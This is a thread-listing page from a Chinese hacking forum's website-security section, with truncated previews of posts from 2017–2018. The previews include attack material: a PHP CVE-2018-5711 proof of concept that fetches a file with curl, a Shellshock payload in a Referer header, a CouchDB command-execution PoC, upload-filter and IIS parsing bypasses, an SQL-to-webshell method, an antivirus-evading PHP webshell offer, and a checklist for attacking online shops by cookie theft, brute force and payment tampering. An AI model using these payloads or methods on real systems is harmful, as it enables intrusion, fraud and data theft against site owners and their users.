诚殷网络论坛—分享思路,记录心得!
网站安全-思路
网站安全-思路

网站安全-思路

今日: 0 主题: 615
回复

29

抱歉,写的可能有些长,然后有的没写好,这里只是概述。希望能带给大家的启示。有感而发,全网第一篇,包括我们论坛都没有。 起 源 在那年还在读初三的我,就一直非常迷恋黑客,看过什么黑客的小说,黑 ...
root 2017-11-19
1399
回复

0

来论坛这么久,没分享什么东西,,相信对大佬来说写个免杀一句话很简单,,,不喜勿喷 申明不是自己写的。。 [mw_shl_code=php,true] 404 Not Found Not Found The requested URL was not found on this s ...
A9VG 2018-2-7
114
回复

0

版本:PHP CVE-2018-5711 [*]PHP 5 < 5.6.33 [*]PHP 7.0 < 7.0.27 [*]PHP 7.1 < 7.1.13 [*]PHP 7.2 < 7.2.1 测试POC: [mw_shl_code=html,true] curl -L https://git.io/vN0n4 | xxd -r > poc.gif php - ...
root 2018-2-4
106
回复

63

漏洞利用详情:http://www.chengyin.org/thread-2776-1-1.html 漏洞所在文件: 漏洞文件代码:(只贴上相关代码) 首先看到一个关键的 ...
root 2018-1-19
538
回复

4

好久没挖了,昨天从个小站开始,没想到收获比较大 首先是找到注入 拿到了数据库中管理的密码 进到后台,发现功能比较单一 找上传点,发现是白名单 开了burpsuite后发现并没有抓到,估计是前段验证 ...
红色刀锋 2018-1-19
398
回复

0

#前言说明条件:数据库为Root权限,有绝对路径。本次Getshell方法就是利用Sql语句来进行Getshell,所以必须是Root权限才可以Getshell,这一发就当做免费的发布吧。通杀哪个就不发出来了哈! #漏洞演示首先我们将下 ...
root 2018-1-14
729
回复

0

#程序简介: ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 #漏洞演示第一步: 点击下载模板 改名为 :cywlteam 上传该模 ...
root 2018-1-12
254
回复

3

这是WVS扫描得到的一个数据包 [mw_shl_code=html,true]GET / HTTP/1.1 Referer: () { Referer; }; echo -e "Content-Type: text/plain\n"; echo -e "\0141\0143\0165\0156\0145\0164\0151\0170\0163\0150\01 ...
root 2017-12-27
609
回复

3

-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个 ...
root 2017-12-20
337
回复

0

看到注册,抓包修改 如果不行,待会改名 上传文件,大马走起 收货地址,见框就插 网站链接,改改ID 找到后台, 试试爆破 123456,用的真多 评价建议,拿拿cookie 没有存储,来点套路 下单支付,改改数字 w ...
陆军菜鸟 2017-12-19
266
回复

0

默认端口5984 [mw_shl_code=html,true]POC 新增query_server配置,这里执行ifconfig命令 curl -X PUT 'http://1.1.1.1:5984/_config/query_servers/cmd' -d '"/sbin/ifconfig >/tmp/6666"' 新建一个临 ...
skeleton 2017-12-18
348
回复

1

默认端口50070 [mw_shl_code=html,true]a)HDFS NameNode 默认端口 50070 DataNode 默认端口 50075 httpfs 默认端口14000 journalnode 默认端口 8480 b)YARN(JobTracker) ResourceManager 默认端口8088 J ...
skeleton 2017-12-18
392
回复

0

默认端口11211 连接成功:↓ [mw_shl_code=html,true] TELNET: ------------------------- ...
skeleton 2017-12-18
133
回复

0

默认端口:9200
skeleton 2017-12-18
305
回复

0

端口:2181或2171
skeleton 2017-12-18
241
回复

0

默认端口:28017 利用可视化工具连接
skeleton 2017-12-18
178
回复

0

默认是8080端口 未授权访问就是任意用户都能访问 都能执行命令 [mw_shl_code=html,true]# 命令集 ...
skeleton 2017-12-18
154
回复

0

环境: 靶机: Kali 192.168.103.50 攻击机: kali2.0 192.168.103.11 攻击机: windows7 192.168.103.2 靶机开启redis服务 攻 ...
skeleton 2017-12-18
173
回复

0

Content-Disposition、content-type、文件内容检测、双文件 1、Content-Disposition [mw_shl_code=html,true]Content-Disposition: form-data; name="file"; filename="ian.php" 1、将form-data; ...
skeleton 2017-12-18
130
回复

1

文件扩展名绕过 1、asp [mw_shl_code=html,true]#IIS 5.0/6.0 #文件解析 .asp;.jpg .asp.jpg .asp;jpg #目录解析 .asp/1.jpg ---------------------------------------------------------------------- ...
skeleton 2017-12-18
160
回复

0

服务器解析漏洞 (一)IIS5.x-6.x解析漏洞使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。目录解析(6.0)形式:ww ...
skeleton 2017-12-18
151
下一页 »

QQ|手机版|小黑屋|诚殷网络论坛 ( 琼ICP备15002356号 )

Powered by Dede 123 © 2001-2016 Hacker.

返回顶部